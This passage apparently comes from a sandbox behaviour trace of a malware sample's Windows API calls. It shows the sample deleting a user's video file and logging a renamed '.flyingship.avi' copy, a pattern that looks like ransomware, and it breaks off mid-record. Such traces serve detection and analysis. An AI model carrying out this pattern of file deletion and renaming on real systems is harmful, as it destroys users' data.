lpMsg=0x87ee3c) returned 0 [0198.042] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\vgcmna4csdu wvha.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0198.043] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.043] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.043] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.043] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.043] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.043] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.043] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.043] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.044] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.044] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.044] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpFilePart=0x0) returned 0x6c [0198.045] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0x1af3b4e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 0x90af58 [0198.045] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\vgcmna4csdu wvha.avi")) returned 1 [0198.047] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0x1af3b4e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 0 [0198.047] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.047] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.047] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.048] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.048] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.048] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.048] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.048] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.049] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.049] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.049] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.049] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.049] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.049] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.049] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.049] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3b23, lpOverlapped=0x0) returned 1 [0198.050] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.050] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3b23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.050] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\n", cchWideChar=122, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 122 [0198.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a) returned 0x9c0c00 [0198.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\n", cchWideChar=122, lpMultiByteStr=0x9c0c00, cbMultiByte=122, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 122 [0198.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0198.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0198.050] WriteFile (in: hFile=0x158, lpBuffer=0x9c0c88*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c0c88*, lpNumberOfBytesWritten=0x87f43c*=0x79, lpOverlapped=0x0) returned 1 [0198.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0198.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.050] CloseHandle (hObject=0x158) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0198.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.053] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.053] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.054] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.055] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.055] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.055] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.055] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: 